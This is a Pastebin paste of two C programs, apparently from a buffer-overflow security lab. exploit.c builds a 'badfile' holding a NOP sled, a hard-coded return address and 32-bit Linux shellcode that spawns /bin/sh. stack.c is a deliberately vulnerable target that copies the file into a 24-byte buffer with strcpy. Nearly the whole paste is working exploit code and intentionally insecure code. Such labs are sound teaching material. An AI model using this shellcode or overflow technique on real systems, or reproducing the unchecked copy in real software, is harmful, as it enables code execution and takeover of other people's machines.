Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /* exploit.c */
- /* A program that creates a file containing code for launching shell*/
- #include <stdlib.h>
- #include <stdio.h>
- #include <string.h>
- char shellcode[]=
- "\x31\xc0" /* xorl %eax,%eax */
- "\x50" /* pushl %eax */
- "\x68""//sh" /* pushl $0x68732f2f */
- "\x68""/bin" /* pushl $0x6e69622f */
- "\x89\xe3" /* movl %esp,%ebx */
- "\x50" /* pushl %eax */
- "\x53" /* pushl %ebx */
- "\x89\xe1" /* movl %esp,%ecx */
- "\x99" /* cdq */
- "\xb0\x0b" /* movb $0x0b,%al */
- "\xcd\x80" /* int $0x80 */
- ;
- void main(int argc, char **argv)
- {
- char buffer[517];
- FILE *badfile;
- /* Initialize buffer with 0x90 (NOP instruction) */
- memset(&buffer, 0x90, 517);
- /* You need to fill the buffer with appropriate contents here */
- /*this line of code places the return address of execution into memory*/
- *((long *) (buffer + 0x24)) = 0xbffff260;
- /*This line places the shellcode towards the end of the buffer*/
- memcpy(buffer + sizeof(buffer) - sizeof(shellcode), shellcode,
- sizeof(shellcode));
- /* Save the contents to the file "badfile" */
- badfile = fopen("./badfile", "w");
- fwrite(buffer, 517, 1, badfile);
- fclose(badfile);
- }
- |||||||||||||||||
- /* stack.c */
- /* This program has a buffer overflow vulnerability. */
- /* Our task is to exploit this vulnerability */
- #include <stdlib.h>
- #include <stdio.h>
- #include <string.h>
- int bof(char *str)
- {
- char buffer[24];
- /* The following statement has a buffer overflow problem */
- strcpy(buffer, str);
- return 1;
- }
- int main(int argc, char **argv)
- {
- char str[517];
- FILE *badfile;
- badfile = fopen("badfile", "r");
- fread(str, sizeof(char), 517, badfile);
- bof(str);
- printf("Returned Properly\n");
- return 1;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement